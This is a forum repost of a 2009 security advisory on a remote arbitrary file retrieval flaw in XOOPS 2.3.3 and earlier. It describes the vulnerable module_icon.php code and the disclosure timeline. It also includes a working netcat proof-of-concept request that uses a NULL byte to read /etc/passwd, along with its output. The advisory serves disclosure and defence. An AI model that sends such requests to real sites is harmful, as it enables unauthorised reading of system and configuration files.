Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 150
Members: 0
Total: 150
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> XOOPS -> XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
Post new topicReply to topic View previous topic :: View next topic
XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
PostPosted: Wed Dec 23, 2009 7:20 pm Reply with quote
as4uif
Beginner
Beginner
Joined: Jun 08, 2008
Posts: 1




Quote:
========================================================================
XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
========================================================================

Affected Software : XOOPS <= 2.3.3
Author : Luca "daath" De Fulgentis - daath[at]nibblesec[dot]org
Advisory number : NS-2009-01
Advisory URL : http://blog.nibblesec.org/advisories/NS-2009-01.txt
Severity : Low/Medium
Local/Remote : Remote


[Summary]

XOOPS is a web application platform written in PHP for the MySQL database.
Its object orientation makes it an ideal tool for developing small or large
community websites, intra company and corporate portals, weblogs and much
more. (Reference : http://www.xoops.org).

Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
2.3.3, which could be exploited to read system or XOOPS configuration files
("mainfile.php").


[Vulnerability Details]

A vulnerable read_file() function can be found in "module_icon.php" under
/xoops_lib/modules/protector/. Here an image icon is read and its full
pathname is constructed using a user-controllable variable called
"$mydirpath" :

=============================================================================
[...]
if( file_exists( $mydirpath.'/module_icon.png' ) ) {
$use_custom_icon = true ;
$icon_fullpath = $mydirpath.'/module_icon.png' ;
} else {
$use_custom_icon = false ;
$icon_fullpath = dirname(__FILE__).'/module_icon.png' ;
}

[...]
} else {

readfile( $icon_fullpath ) ;
}
?>
=============================================================================

If register_globals is enabled and magic_quotes_gpc disabled, it's possible
to control the "$mydirpath" variable content and inject an arbitrary filename
(followed by a NULL byte (%00) to make file_exists() function ignore the
following "/module_icon.png"), resulting in file content inclusion in
application response.


[Proof of Concept Exploit]

Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the
one generated by the vulnerable script). Bacause of this netcat/telnet can be
easily used to exploit this vulnerability :

daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?
mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80

HTTP/1.1 200 OK
Date: Mon, 16 Mar 2009 19:07:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Expires: Mon, 16 Mar 2009 21:00:00 +0100
Cache-Control: public, max-age=3600
Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
Content-Length: 1661
Connection: close
Content-Type: image/png

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
daath@shaytan:~$


[Time Table]

17/03/2009 - Vendor notified.
17/03/2009 - Vendor response.
28/05/2009 - Vendor re-contacted (no answer).
16/06/2009 - Public disclosure.


[Legal Notices]

The information in the advisory is believed to be accurate at the
time of publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
Permission is hereby granted for the redistribution of this alert,
provided that the content is not altered in any way, except
reformatting, and that due credit is given.

This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html



# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke

# milw0rm.com [2009-06-16]
View user's profile Send private message
XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
www.waraxe.us Forum Index -> XOOPS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.050 Seconds